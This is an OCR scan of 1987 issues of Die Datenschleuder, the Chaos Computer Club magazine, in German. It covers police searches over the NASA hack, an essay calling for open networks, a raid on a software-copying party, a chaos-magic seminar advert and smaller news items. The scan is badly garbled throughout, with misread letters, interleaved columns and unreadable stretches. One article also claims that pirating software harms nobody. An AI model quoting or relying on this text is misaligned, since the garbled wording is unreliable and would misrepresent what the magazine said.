ach bewhrter Art erden die Teilneher in den fnf chaosnagisclien Srunddisziplinen Divination, Invocation, Evokation, Zauberei und Illusination ausgebildet, das Erlernte wird in der Praxis geprft. Bs handelt sich also ui eine echte Einweihung in den Energiestron der undogiatischen lodernen Chaos-Magie. Fr Anfnger wie fr Fortgeschrittene geeignet, Aus d e P r o g r a n : Magischer Paradignenweclisel in der Praxis die Principia Kagica, die Grundstrukturen der Magie 4 schaiianische Praktiken und loderne Technologie 1 chaoistische Kaipfsagie ' Quantenzauber * der Technofetisch ' Atavisius und Trauiarbeit * die Erschaffung von Psychogonen ' Chaos-Magie und Gruppenarbeit ' praktische Einweihung Kraftbertragung und Kraftabzug ' Chaos-Magie und Runenarbeit das iagische Pentathlon ' lagisches Schaltkreistraining ' Arbeit ait den Chaos-Schir ' Heilungs- und Sprengglyphen 4 die Nacht des Schreckens ' die Kesse d e s Chaos u.a.a.
i

Seainarteriine: 05.-03. Juni 1987; Seainarort: Nhe Bern/Schweiz Seiinargebhr: DM 560,- (Anzahlung: DM 260,-, Rest bei Seainarantritt) Strikte Begrenzung der Teilnehienahl - daher baldige Anieldunq eipfohlen! Sitte beachten: Pete Carroll und Frater V.-.D. , fhren jedes Seminar insgesamt nur drei Mal durch, u i eradende Fliefbandroutine zu verseiden. Dieses ist die zweite Veranstaltung, also die vorletzte Chance fr S i e , an Seiinar "Chaos-Nagie und Freistilschaianisius" teilzunehien.
aus-, "tutiis", m:rscnnJFr Alv ri/A ,

24

uimtfP
^ g

I I 1

I I I

IMPRESSUM
I i i i i i i Die Datenschleuder N u m e r o 23 - Oktob 1987 D a s w i s s e n s c h a f t l i c h e Fachblatt fr Daten reisende D-2000 Hamburg 20 Schwenckestrasse 85 Geonet: Geol:Chaos-Team C L I N C H : Chaos-Team B t x : *Chaos# t e l : 040-4903757 / 040-483752

KURZ VOR SCHLUSS


27.l0.l987 - Neue BKA-Aktion Dleam) wg. NASA

Herausgeber I I

C C C e.V.
Das BKA 1st zu dieser Stande mal wteder ein Jahr gegen Sieben t t i g . Nachdem man och m e h r ala loszuschlagen

gebraucht h a t t e , u m In Sachen

CERN/PHILIPS nnd

J ViSdP: Reinhard Schrutzki I I Mitarbeiter (u.a.): I D D T , A. Eichler, P. Franck, H. Grusel, Herwart Holland-Moritz, j w i , KS, M . Kuehn, Andy M.-M | j . Nicolas, padeluun, Poetronic, S. Stahl, S. W e jnery, T A M . I Nachdruck fr nichtgewerbliche Zwecke bei Que lenangabe erlaubt. berraschter GesichtsausDruck im Selbstverlag j l u l i 1987 I

gegen die Falschen der NA5A-Sacbe

vier C C C - M t t g l l t d e r zu e r m i t t e l n , geht es I n offenbar schneller. Beamte des BKA n n d d e r H a m b a r g e r Kriminalpolizei d u r c h s u c h e n derzeit die eines C C C Mitgliedes wegen Prtvatwohnang de Verdacht

der AusspShung-von D a t e n (202 a S t G B ) .

MiUJiedtcfialt im Ctuos Computer Club e.V. JaMf-bun* tu/ Schuler. SrjSeiiea. ;pJ?e MJiteibemif lr ono rfermiiuttr JiftfeibeitTJ{ 1 / tnotiCe" naiiie ( a t me 0 e l PiamiiH Vi\M4injfiti(eftuAr bei Eintritt UiitiiM** 4 CCC irtilm M I au drt IHfSI I Teilnitie a dtr INFEX - Miiibo: a Etwailue iBUHuniiteBiiir H n < n nA Po Heul < >uv X i Vi!rBL&dUfi{ Hiout ie Hice/tcet ucfc HuBufli U Trtri, laier

Best eilt eaen 1 8 97


PersoaeaBogen

Der seinerzeit geuerte Verdacht, die BKA-Aktloo zweier gedient, In den RSomen eine um 1st, In wer de CCC habe e.V. nur ond dazu zu beaaer neuen kann kann Vorstandsmitglleder sich anderen Urheber

CZI Svtlc' Hmwm( nn e itn a dn CC n 4 wimrl C > C b i :J4i\un ew

ilMff

Granddatensammlung Pillen dieser

verschaffen, gen. Unklar

e r m i t t e l n z a k n n e n , scheint sich za besttiBKA-Aktion 1st, denn d e r 202a S t G B

V-

'

n o r angewandt werden, wenn ein nicht von sich aas t t i g werden.

Betroffener

Anzeige e r s t a t t e t . Die S t a a t s a n w a l t s c h f t

You should not...


h i n I M a M nUtn. Ltrrtrmkn x u i a l i i n i

Dies als kurze direkte I n f o r m a t i o n , eine offizielle Presseerklrung des C C C f o l g t In KUree. C I J N C I I / C H A O S / S YSOP/27. iO.BT/ i8.06/97f Z .

Di 1 F J in tu torneeratUc) MkUbbtiyMtn b s r U e Ptit. 1k *o>t HE m e t ca c a l 8ourtef ofieo pi/lelun Syma u e u d diGeNet- OicuQtvntea bsom. Bwa a nun Beuei! 0ten*A*diefl5te, Telewenantf aid - CiupUot. letenMil iniet C o t - 0*. wa u d aicti 3TZ. C Drtt B f runaeuca 0Btora wtrt* e Mf * n I i a ,re*t mit 4m C C ,k(rtciw*(. w iuhr.a nio SilMttU c C w weiter W r a a prenwcrtta A s U a ia O taoocrscilc M*ilben nett. ist e i ae u l mit InJei bfimi elitei TiiJnjimie ia der CLINCH - Mabox EuututU Euitnjuacutbufe' Monatif butu !u/ Sctiuler eic iBICtTMll. T , d U y l !iU Oe LN M - t-ll < -' C < n M mHH.Wl't. TriCL fB' r IC ife AlttrWCv m " e IS213iiniri/o Sri'enes n sc* Dtna* ** < Jn a tia Diki FanrarVcrlfUif. die witKwn (an urtr4a tbuta. D u LN H uJ LfilfJAi C I C - Bat > eia Saint d f Lmn wa CcsNci Boiea ul -men M - o - S jucabv . D Abrcftnua* im SD V i lunun > < .rii Jii C I C 0 L C C - Milil ! ! . > LH X O C Or :u(fiit tu/ iBtaciie eretm. Ji if aomaic N*st aicai nu Vnu<iin| e :CZ vici:*-jier - e Eoi KootdinittuoiHuHiet:1 Vwudi oni itt ficaaitjea

Ut letzt aed du Oidt Eid. Sine 4* iwaaunillti S ie di et n

E
Bm^T^^u P e x ci B Q 9 w n n f pn V SMk Q cc p r Ubeiwtuum f~] e M n Ha*b45btitji| lr C S wtJieisfi lBtti( wi Ul|t utlen. ee i C 8D peV-JciecC3 ?" Uier*eisuai O Utl rw*r u uhrtitt i_j tn iluoa Q i*ainca Q

Hiermit mchte ich alle Datenschleuder-Leser dringend davor warnen, die Telefonnummer 00490811 resp. 00490811 zu whlen. Nach dem Whlen der Nummer liegt bis zum Unterbrechen der Verbindung (sprich auflegen) ein ca. 0,8 SekundenGebhrentakt auf der Leitung, der zur Folge haben knnte, da die Telefonrechnung rasant ansteigt. Und das mu doch wirklich nicht sein, oder?

X
Termin

Ctuoi Coapoter Club e.V. y f \ inter Srtwfacluriie 20 Kaatiut 00 P Mu Jtimi HaGui(. 3 of Andy 198709271400 TELWDS23.DOC Ls 16 CLINCH/SYSOP/GAST/27.09.87/18:34/469Z. Spie Snlciiirfflcubcr SntcnSdjIcubcr

A m Wochenende 6/7. Dez. findet jeweils ab 10:00 in den Rumen des F O R B I D eV (040-439 2336) eine Vorbereitungstagung freine internationale Tagung im Oktober '8g zum Thema "3. Welt und neue Technologien" statt.

KS

26

27

ISS N 0930-10451

>ie ^atendjieuct*
Das wissenschaftliche Fachblatt fr Datenreisends
Ein Organ des Chaos Computer Club

Postvertriebsstuck C9927F

WERBUNG
OD

Blick

fr/pitt

de?

JZCT??
( ^ f ^ p i c niciiiirfiicufccr

Spi'frl

Editorial
In einer Billstedter Kche kommt NDR 2 aus einem Topfdeckel Offene Netze - Jetzt
Eine Analyse ber Denkstrukturen und Strategien

Kommentar

im

(CLINCH-)Brett

Rechtswesen!

( " B K A rotiert..") - allerdings m i t vertauschten R o l len. ^ Topfdeckel ... \ \'.Lautsprecher"


x

Kopfschttelnd steht Christian Wolany (42) in seiner blitzblanken Einbaukche. Ich habe einen ganz normalen E-Herd und aus dem kommt Musik" sagt er. Tatsachlich. Obwohl nirgendwo in der Wohnung ein Radiogert eingeschaltet ist, ertnt leise Musik. Sie schallt aus einem Topfdeckel, der auf dem Rand zwischen Herd und Edelstahlsple liegt. Ich hab' in meinem Leben ja schon viel erlebt, nun glaube ich aber bald an Gespenster", sagt der Hausherr. Seit Mai 1987 leben Christian Wolany und seine Lebensgefhrtin Brigitte Winterlich (40) in der Dreizimmerwohnung am Rantumer Weg in Billstedt. Unerklrliche Dinge waren ihnen noch nie aufgefallen. Doch nun scheint es im zweiten Stock des Neubaus zu spuken. Hobbykoch Wolany hatte seiner Freundin versprochen, das Abendessen zu bereiten. Bratwurst mit Brokkoli und Kartoffeln standen aufdem Speisezettel. Ich arbeitete wie immer am Herd und habe alles vorbereitet. Als ich dann die Kartoffeln abgieen wollte, dachte ich: Entweder bist du bekloppt, oder so was gibt es wirklich", sagt Christian Wolany. Aus dem Deckel des Kartoffeltopfes, den ich auf den Herd gelegt hatte, ertnte klar das Programm von NDR 2." Auch seine Freundin und herbeigenifene Nachbarn wollten ihren Ohren nicht trauen. Deutlich konnten sie die Sendung aus dem weien EmaiUedeckel hren. Ein Scherz war es auch nicht, denn weder im Herd noch In der Sple oder einem der Schrnke war ein Radiogerat versteckt. Wie aber kann das funktionieren? Eine Antwort hat die Sendetechnik des NDR. Sie lautet: Unter bestimmten Bedingungen kann es vorkommen, da sich in Haushalten ein sogenanntes Ersatzschaltbild aufbaut Irgendein Metallgegenstand wird dabei zur Antenne, ein anderes Mbelstek aus Metall bernimmt die Aufgaben eines Gleichrichters, ein drittes Teil schlielich schwingt wie die Membran eines Lautsprechers. Bei Christian Wolany spukt es also nicht Sein Herd oder die Sple empfangen als Antenne das Mittelwellenprogramm des NDR vom nur etwa drei Kilometer entfernten Sender Moorfleet Eines der beiden Kchenmbel wandelt die Hochfrequenzwellen um, der Topfdeckel spielt schlielich den Lautsprecher. Ein ausgesprochen seltener Vorgang, physikalisch aber zu erklren. HO

Herd als .Gleichrichtet

, N y'^

D a der N A S A - C o u p nachhaltige V e r n d e r u n gen i n d e r H a c k e r - S z e n e b e w i r k e n w i r d , ffentlichkeit angestellten war. Die war s c h o n k l a r , als d i e G e s c h i c h t e n o c h n i c h t in d e r So kommt Musik In den Topfdeckel: Oer Sender strahlt dos Programm ab, Sple und Herd wirken alt Antenne und Gleichrichter, der Deckel all Lautsprecher zkhwng: Michaelis Ermittlungsbehrden Behrden sind relativ reagieren entsprechend der schon v o r M o n a t e n Planspiele. leicht berechenbar. A l l e r d i n g s halte m a n m e h r Intelligenz u n d subtileres V o r g e h e n unterstellt. S t i m m e n d i e I n f o r m a t i o n e n , die d i e i n s t a l l i e r t e n M e f h l e r signalisieren, scheint nicht n u r Wissen u m technische Z u s a m m e n h n g e das unter

d e m a n g e n o m m e n e n K n o w h o w z u liegen. V i e l -

Don't unk - funk


Funkgerte f r CCCongress Z ur reich, legale Konkret Bereich gewissen Im Gewhrleistung auf dem sich wenn CB zur der bentigt Sicherheitsmawre es hilfstellende kleines wrden. eventuel I von wird behalten.

m e h r scheinen die E c k p f e i l e r der strategischen P l a n u n g e n d e r E r m i t t l u n g s b e h r d e n aus Z e i t e n z u s t a m m e n , die die gesellschaftlichen V e r n d e rungen durch rcksichtigt. G l e i c h z e i t i g reagieren auch T e i l e der S z e n e n a c h veralteten Strategien. Platt gesagt: N a c h d e m 68erM u s t e r w i r d eine kapitalistische b e r m a c h t unterstellt, f r die der Staat Btteldienste leistet, m i t d e m Z i e l , d i e k l e i n e n L e u t e an d i e K a n d a r e zu n e h m e n u n d das V o l k zu unterdrcken. D a r b e r kann j e d e r Staatsanwalt n u r lachen u n d o h n e Schwierigkeiten das G e g e n t e i l beweisen. E i n o b e r f l c h l i c h e r B l i c k a u f d i e T t i g k e i t des Kartellamtes reicht aus. D i e Frage, w a s passiert w r e , w e n n nicht b e i m CCC, - 5. A b s a t z : " I c h g l a u b e , d a dies i n z w i s c h e n ein Fall fr den Verfassungschutz ist. Ich d e n k e , d a ber diese S c h i e n e k o m p e t e n t e Experten z u finden sind, die E r f a h r u n g e n u n d V e r b i n d u n g e n h a b e n , u m den durchgeknallten H a c k e m d i e R o t e Karte zu zeigen. U n d ich denke, d a es jetzt A u f g a b e des B K A ist, sondern bei I B M durchsucht w o r d e n w r e , ist entsprechend einfach zu beantworten. Statt in Plastikscken htte m a n das sichergestellte Z e u g in L K W ' s - 2. A b s a t z : " D a s V o r g e h e n der H a c k e r halte ich i n z w i s c h e n f r u n v e r s c h m t e Ubergriffe. D i e s ist nicht n u r ein persnliches P r o b l e m eines R o y O m mond. Hier wird ein Przedenzfall geschaffen. W e n n es uns nicht gelingt, d e m C C C u n d den Hackern v o n Richtern erheblich a u f d i e F i n g e r klopfen zu lassen, d a n n werden d i e A k t i v i t t e n der Szene k n f t i g i m m e r n a c h g l e i c h e m Verfahren a b l a u f e n . " (...) die C o m p u t e r t e c h n i k nicht be-

nahmen

Congress (also

Verftigung sowie im ber zu ein

Sicherheit s k r f t e Sortiment an geht einen

Chaos-Dienstler) mitbringen

Funk-Gerte Quarzen es

darum,

Eideistedter

t l b e r b l ick

vorhandene Rahmen

(Truppen-) unseres

Bewegungen

"Ordnungskrften"

Frhwarnsystems

dies l e i d e r n t i g sein...

Andy 198712121942 C O N C R - C B . D O C L a 16

abtransportieren m s s e n .

^OESHfTu, I Start der ^atenuerarbeitung\ > ara Postschatter I

diese G e g e n m a n a h m e n zu k o o r d i n i e r e n " (..)

Alter Wein fr alte Schluche


Ersetze nun.. Analysiert m a n d e n D u k t u s m a n c h e r K o m m e n t a r e , d i e sich kritisch m i t der B K A - A k t i o n auseinander" H a c k e r " durch " S t a a t s a n w a l t s c h a f t " " R o y O m m o n d " durch " W a u H o l l a n d , Steffen Wernery" setzen, wird ersichtlich, w a r u m bisherige Revolutionen i m m e r ihre eigenen K i n d e r gefressen haben. E s werden lediglich M a c h t v e r h l t r i s s e u m g e k e h r t , d o c h d i e D e n k s t r u k t u r vernderte sich nicht. U m das plastisch z u m a c h e n , hier e i n i g e Stze aus einen

200 .
Handwerbestempel zum Start der Schalterterminalsystema

nuk I am

qtmatn the ercator

kthu of darkness

Seite 2

( j f f ^ r p i c SatcSrfjIciiiicr

^ ^ p i c

SflicnSrfjcuber

Seite 3

" C C C durch "BKA" "BKA" durch " C C C "Szene" durch "Ermittlungsbehrden" "VS" durch "Humanistische Union" (= Zusammenschlu von Demokraten, die sich fr die Brgerrechte einsetzen, zum Schutz vor bergriffen des Staates gegen diese Brgerrechte.) ..und schon sind die Kemaussagen des Orginals wieder hergestellt. Analysen, die von dieser Denkstiuktur beeinflut werden, fhren zum Krieg - zum Krieg zwischen Eimittlungsbehrden und Hackern, wobei die Hacker auf technischer Ebene die besseren Karten haben.

- Das BKA wird sich bei einer Verfolgung der falschen Leute dermaen blamieren, so da die Chancen zur Eindmmung wirklich bedrohlicher Computerkriminalitt um Jahre verspielt werden. (*) Diese Aussagen drfen auch ohne Nennung der Quelle in geheimen Strategiepapieren des BKA verwendet werden) Die oben angedeutete Denkstruktur impliziert veraltetes Freund-Feind-Denken, das am Ende in einem Psychokrieg endet, wobei auf DIESER Ebene die Ermittlungsbehrden mittelfristig die besseren Karten haben. Doch was kommt dabei heraus?

diese Entwicklung aufhalten knnen. Warum auch: an der prinzipiellen Situation wird sich nichts ndern. Selbst wenn B.H.P. und CCC samt Umfeld mit dem geballten Know-How Unterabteilungen des BKA wren - die Aufklrungsquote wrde sich nur unerheblich steigern. Die Informationstechnik - und der Schei, den man damit anstellen kann - lt sich nicht kontrollieren. Das BKA kann sich also die psychologische Unterwanderung schenken - am Ende ist es mit viel Aufwand genau so schlau wie vorher. Sie werden wissen, da sie nichts wissen knnen. Und das knnte man dann "institutionelle Weisheit" nennen. Da man beim BKA trotzdem Bewhrtes ausprobieren wird, ist klar. Jeder mu seine Fehler selber machen - auch eine Institution. Aber es wird sich in der Abteilung "Computerkriminalitt" des BKA in den nchsten Jahren die Erkenntnis durchsetzen mssen, da eine Spaltung der Szene in "kriminelle" und "artige" Hacker fatale Folgen hat. Schafft man auf diesem Wege Computer-Terroristen, wird man die Geister die man rief nicht mehr los. Es wird aussichtslos sein, logische Bomben in irgendwelchen Rechnern der Welt finden zu wollen. Diese Entwicklung kriminalistisch anzugehen, kommt dem Versuch gleich, den Ozean mit einemFingerhut ausschpfen zu wollen.

Offenheit beinhaltet gleichzeitig die fr jede Demokratie notwendige bersicht ber die laufenden Entwicklungen. Freie Daten, lautet die Forderung fr die Zukunft - und das ist gemeint, wenn Hacker die maschinenlesbare Regierung fordern. Der Effekt dieses Hacker-Grundsatzes trat bereits 1967 am Massachuetts Institute of Technologie (MIT) zu Tage. Als ein Projektleiter am MIT die Einfhrung von individuellen Pawrtern anordnete, brachten die Hackerdas neue Programm immer wieder zum Absturz und schrieben ihrerseits ein Programm, bei dem der Benutzer lediglich den Befehl "kill system" einzugeben brauchte - schon blieb der Rechner einfach stehen. Ein paar Neugierige probierten diesen Befehl aus, doch als sie erlebten, da der Rechner tatschlich abstrzte, machte niemand mehr von dieser Mglichkeit gebrauch. Der Nachhilfe-Unterricht fr's BKA sollte deshalb weniger auf technischer Ebene laufen, sondern als Seminar fr Zukunftsfragen gestaltet werden.

Aufrstung zum Informationskrieg


Im Informationskrieg mit dem BKA werden die Hacker mit Public-Key-Schlsseln aufrsten. In zwei, drei Jahren wird es kaum noch Festplatten ohne verschlsselte Files geben. Gleiches gilt fr die iMailtoxkominunikation.Sptenstens an dieser Stelle kann das BKA einpacken, die Vorstellung ist gelaufen. Aber auch das, was bei einigen als Hackerethik in den Kpfen steckt: Offenheit und freier Zugang zu allen Informationen fr alle. Davon spter mehr. Fr's BKA stellen sich schon jetzt folgende Probleme (*): - die Quantitt der zu sichtenden Informationen und des Datenmlls bringen die Ermittlungen ins Schleudern. - Der Soft- und Hardwaremarkt mit stndig wechselnden Systemen und Konfigurationen ist derart unbersichtlich, da ihn niemand berblicken - geschweige denn, kontrollieren kann. Die paar 100 Megabyte die zur Zeit durchgeflht werden, sind nur ein kleiner Vorgeschmack dessen, was bei dieser BKA-Strategie zu leisten wre. - Die Ermittlungsbehrde mu im nachhinein gegebene Programme und Strukturen analysieren, was bekanntlich weitausmehr Know-How erfordert, als diese Programme und Strukturen zu entwickeln. Platt gesagt, die Abteilung "Computerkriminalitt" im BKA mte knowhow-mig um einige Prozentpunkte besser sein, als diejenigen die sie fangen will, was, bezogen auf die Hackerszene, ein aussichtsloses Ansinnen ist.

jwl 280145 Okt 87 BEREICH CLINCH OFFEN

IMPRESSUM
Sicherheit durch absolute Offenheit Planspiel Version BKA 2.4
In der ersten Phase kann sich das Katz-und-MausSpiel zwischen BKA und Hackern zur Unterhaltungsshow fr die Nation entwickeln. Das BKA sammelt dabei Know-How und lt sich dafr auch gerne ein wenig verarschen, denn jeder Fehler, jede Peinlichkeit enthlt gleichzeitig unbezahlbares Wissen. Die Hackerszene hat ihren Spa und der Anteil "staatlich geprfter Hacker" (Hausdurchsuchung) erhht sich, so da auch diese Auszeichnung an elitrem Wert verliert. Die Unterhaltungsshow verliert irgendwann ihren Reiz und es beginnt die zweite Phase. Da wage ich die Prognose, da fr einige Freaks das erste Techtelmechtel mit dem BKA zu serisen Arbeitsvertrgen fhrt. Da werden sich dann andere frchterlich drber aufregen - aber niemand wird Es gibt zwei Mglichkeiten, mit den kommenden Problemen umzugehen: Eine intelligente und eine weniger intelligente. Die weniger intelligente wird gerade vom BKA praktiziert. Die intelligente wre, wenn das BKA mit den Hackern an einem Strang ziehen wrde - und diese in der Forderung nach Offenen Netzen untersttzen wrde. Es ist manchmal vernnftig, auf die zu hren, die mehr Erfahrungen im Umgang mit der Zukunft haben. Wenn die Zukunft Perspektive haben soll, mu man sich von bestimmten Denkstrukturen, vom FreundFeind-Schema, verabschieden - auf beiden Seiten. Das wird fr manche ein schmerzhafter Proze werden. Es bleibt, will man den Informationskrieg vermeiden, nurdieForderungnach Offenen Netzen. Wo Information frei ist, braucht nichts versteckt zu werden, der Psychokrieg um die Verstecke entfllt, denn wir brauchen niemanden, der in vermeintlichen Verstecken schnffeln mu. Sicherheit durch absolute Safcirdffeiiber Die Datenschleuder N u m e r o 24 - Dezember 1987 Das wissenschaftliche Fachblatt fr Datenreisende D-2000 Hamburg 20 Schwenckestrasse 85 Geonet: Geol:Chaos-Team CLINCH : Chaos-Team Btx : *ChaosJ tel: 040-4903757 / 040-483752 Herausgeber und ViSdP: Reinhard Schrutzki Mitarbeiter (u.a.): DDT, A. Eichler, P. Franck, H. Grusel, Herwart Holland-Moritz, jwi, KS, M. Kuehn, Andy M.-M., J. Nicolas, padeluun, Poetronic, S. Stahl, S. Wernery, TAM, MeU, JACtUE , Chms1 <)/'??,. Nachdruck fr nichtgewerbliche Zwecke bei Quellenangabe erlaubt. Unter EreignisDruck im Selbstverlag.

Seite ^

( j f ^ f y S k SMlirfifcuhcr

Seite 5

Programme auch nur die geringste Chance haben, gesehen zu werden, sind sie auch schon ausgeschaltet und das nchste I N T R O wird eingelegt. Hier und da schaut man sich auch mal ein Programm an. B E C K E R - T E X T gefllt WORDPLUS-Benutzern recht gut. D a ich schon lange keine Computerzeitungen mehr kaufe, htte ich vonderExistenzdieses Programmes nie erfahren. Wenn nicht, ja, wenn nicht in Bielefeld die BIT-NAPPING-PARTY-V1.0 stattgefunden htte.

Festnahme und 'Frhstck danach'

Drei Tage spter, Punkt 14 Uhr (da beginnen unsere galeristischen Geschftszeiten) standen drei Herren im Laden. Ja, richtig, die Kripo. U n d da standen sie nun mit Haussuchungsbefehl fr Laden, Privatwohnung, Keller, Speicher und Auto. O b wir mit der Hausdurchsuchung einverstanden seien, eine Frage, die man stets nur verneinen kann. Der Bitte um Aushndigung der Liste mit Namen und Adressen aller Gste konnten wir nicht nachkommen, denn selbst wenn sie existieren wrde - knnte doch schlielich niemand von uns erwarten, da wir sie bei uns aufbewahren wrden. Dieser Argumentation konnten sich auch die Beamten nicht verschlieen.

Aber einen Fehler sollten 'Veranstalter' und 'Gste' von solchen Partys nicht machen: Kriminalroman spielen. Nur weil es unangenehm ist, wenn die Exekutive in den Disketten herumschnffelt, mu man sich nicht einigeln. I m Gegenteil. Je offener und aufrechter ein jeder zu seinen Handlungen steht, desto weniger lassen sich die Hacker und Cracker und Kids und/oder wie sie alle heien, in die Kriminalitt drngen. F R E E F L O W O F I N F O R M A T I O N ist mehr als nur 'Hacker-Ethik'. Ich mchte hier an dieser Stelle nur wenig ber 'Profis' verlauten lassen. (Bezglich der Diskussion Geld/nicht Geld fr Raubsoftware). Der 'Profiraubkopierer' hat einen Job mit 60 WochenArbeitsstunden, der sich in seiner Eintnigkeit kaum von einem Fabrikjob unterscheidet. Manche Menschen brauchen halt neben dem neuesten Video und dem abgefahrensten Drink auch stets die neueste Version von MacMllomatPlusTM. Ich sehedies als ein Suchtproblem an, das sich aus dem Wesen des Mediums selbst ergibt. Diese Sucht ist nur ber den - auch professionellen - Graumarkt zu befriedigen; bei einem Durchschnittseinkommen von ix-Markfuffzig Taschengeld. Geschadet wird tatschlich niemandem, denn kaufen wrde trotzdem niemand das Zeug. Die Verkaufszahlen der Ballerspielchen sind - so haben Befragungen des Fachhandels ergeben - immens hoch. Verhungern wird niemand in den SoftwareFtrmen. Hchstens die freien Programmierer, die sich die Programme fr viel zu wenig Geld abkaufen lassen. Das Suchtproblem, das die Jagd nach der immer neuesten Software darstellt, sehe ich selber als relativ harmlos an. Es erledigt sich eines Tages von selbst. Ein jeder stellt fest, da diese Welt keine ausschlielich elektronische ist und da es unmglich ist, ein Programm in seine Freundin einzugeben und da es vielleicht an der Zeit wre, erst einmal sprechen zu lernen. Die kopierten Spiele machen eh' schon seit langem keinen Spa mehr. Sie werden lediglich kopiert und weitergegeben. Fr Telepathie gibt's keine FTZ-Nummer, und Bier schmeckt in Gesellschaft immer am Besten. Weitermachen.

Bit-Napping

padeluun u n d R e n a Tangens von der Galerie A r t d'Ameublement i n Bielefeld sind dem Computerfreund bereits durch ihre P U B L I C D O M A I N Veranstallungen i m B u n k e r U l m e n w a l l bekannt. A n l l i c h der von ihnen i m vergangenen M o n a t durchgefhrten BIT-NAPPING-PARTY-V1.0 sah die K r i p o - scharf gemacht von einer groen S o f t w a r e f i r m a - sich veranlat, eine Hausdurchsuchung vorzunehmen. "Raubkopieren". Welch unschnes Wort. Niemand raubt. Eigenich heit es "Softwaretausch". Der Artikel von Csar/Stpsel in der letzten DATENS C H L E U D E R und die Hausdurchsuchung in Bielefeld erfordern eine Stellungnahme. Schon i m m e r bestaunte ich die Diskettenksten bei den Kids. Hunderte von Disketten, jede drei Mark teuer - m a l mehr - mal weniger. "Hast Du...", meine naive Frage. " K a n n sein, falls ich's nicht gelscht habe." Fast i m m e r die gleiche Antwort. Und bei " Z e i g mal was" der G r i f f in die Kiste. Diskette einlegen und - ja, und dann kommt ein I N T R O . D i e Cracker haben in 'zweistndiger Arbeit' mal eben das U n m g l i c h e mglich gemacht. D a stellt der A T A R I pltzlich 46000 (?) Farben gleichzeitig auf dem S c h i r m dar, der A M I G A bringt ein fnfmintiges gesampeltes Musikstck 'rber' und der gute alte C 6 4 wird bis ber den Bildschirmrand hinaus m i t formatfllenden hchstauflsenden Farbgrafiken aufgepeppt. Ich wei, da das alles technisch unmglich ist und vor meinen A u g e n passiert es. Und. W a s hat das mit ' R a u b k o p i e n ' zu tun? D i e kommen dann hinter dem I N T R O . U n d bevor die K I N G S OFT- oder A R I O L A C^tytZic nfcnidjleubcr

Schon der Titel der Veranstaltung sagt alles. Schlafscke und Rechner sollten mitgebracht werden, gerchteweise verbreitete sich die Nachricht bis hinein in die greren Softwarehuser: da da flschungssichere und durchnumerierte Einladungskarten unterwegs waren. Die Bit-Napping-Party fr sich war ein voller Erfolg. W i r Lachten selber ber unsere Sicherheitsvorkehrungen. In Bielefeld mute sich der Gast erst einmal bei der Anlaufadresse melden, und von dort aus wurden die einzelnen Gste zum Ort des Geschehens geschickt. Das eigentlich Erstaunliche spielte sich (wie wir erst 'beim Frhstck danach' erfuhren) kurz nach dem letzten Einlaschlu drauen auf der Strae vor der Anlaufadresse ab. Ein junger Herr, der leider etwas zu spt kam und niemanden mehr antraf, sprte eine Hand auf der Schulter und wurde das erste Mal in seinem Leben 'vorlufig festgenommen'. Er wurde mit a u f s Revier genommen und in seinen Taschen fand man neben einigen Disketten ('Alles Originalsoftware', grinste einer der Beamten) auch - natrlich, denn ohne diese kein Einla - eine Einladungskarte. W o er diese her habe. Nun und das stand j a gro und breit drauf: Art d'Ameublement. Die Leute mit der M O D E R N S T E N K U N S T hatten zur 'CrackerFete' geladen. Der junge M a n n , der Montags beim Frhstck von seiner Festnahme berichtete, erzhlte Unglaubliches: Videokameras lagen da rum und Spiegelreflexkameras und mindestens sechs Kripo-Beamte wren daran beteiligt gewesen und htten ihm erzhlt, da 'eine Anzeige von auerhalb vorliegen wrde' und da ihre Taktik gewesen wre, reinzustrmen und erst mal alles zu vilmen und zu fotografieren. (Allerdings mute der Trsteher immer erst mal den Schlssel holen gehen...). Die Erzhlungen klangen seltsam. W i r erzhlten die Geschichte gerne weiter, aberhaben sie eigentlich nicht so recht geglaubt.

Ganz heie Leute


Sie waren freundlich, und freundlich zeigten wir Ihnen den Computer (wir waren gerade dabei, Rechnungen zu schreiben), das Diskettenlager, und schon nach 10 Minuten war unser Anwalt zur Stelle. Dann wurde grob oberflchlich die Geschftskorrespondenz durchgewhlt und anschlieend erzhlte uns der Beamte noch, da der 'Anzeiger' noch zum Besten gegeben htte, da wir 'ganz heie Leute' seien. W i r htten auch den (ich kann das Wort nicht mehr hren) NASA-Hack mitgemacht. Wieso erzhlt jemand so etwas? Und die Antwort war smtlichen Parteien klar: D i e 'Bullen' sollten 'hei gemacht werden, damit sie sich auf jeden Fall der Bit-Napping-Party annehmen. Auch die Polizisten fhlten sich von den Software-Firmen regelrecht mibraucht. Nett wurde der Dialog, als Rena dem Leiter der Aktion einen Aufkleber vom F B u D e.V. anbot und der Herr nur trocken antwortete, da er gerade berlegen wrde, ob er A L L E mitnehmen sollte. Er unterlie es. Alles, was beschlagnahmt wurde, waren etwa 60 Originale mit Seriennummern und etwa ebenso viele Raubkopien: Der Rest der Einladungskarten und briggebliebene fotokopierte Stadtplne. Fr die Besucher von auerhalb, damit sie den Ort des Geschehens leichterfinden. Natrlich ohne Kreuzchen an der betreffenden Stelle. Es ist anscheinend nicht die einzige Veranstaltung, die 'hochgenommen' werden sollte. W i r hatten Glck, da wir uns aus den (uns selbst unsinnig erscheinenden) Sicherheitsvorkehrungen einen Sport gemacht haben. Ohne sie wre die frhliche Party sehr viel eher beendet gewesen, ein Zentralcomputer (oder Karteikasten?!) mit einer Menge berflssiger Personaldaten gefttert worden und einige Eltern wren vermutlich aus allen Wolken gefallen.

Art d'Ameublement Rena Tangens & padeluun CLINCHyPOETRONIC/PADELUUN/28.11.87/20:28/8522

Seite P

Seite 7

l^l^rSic

aicnidjlenhcr

AufgeDECt
Editorial des DECKBLATT Nr.11,1987

Schuld sind aber auch die System-Betreiber selbst. Hundertprozentige Sicherheit ab Werk ist eine Utopie. Es ist auch und vor allem Aufgabe der System-

CCC und NASA


Viel Rauch um nichts

Wirtschaftsdaten
Digital Equipment Corporation
Digital Equipment G m b H Freischtzstrasse 91 8000 Mnchcn 81 Tel.: 089/9591-0 Telex 5 215 780 Btx 20898 Telefax 089/9591-1010

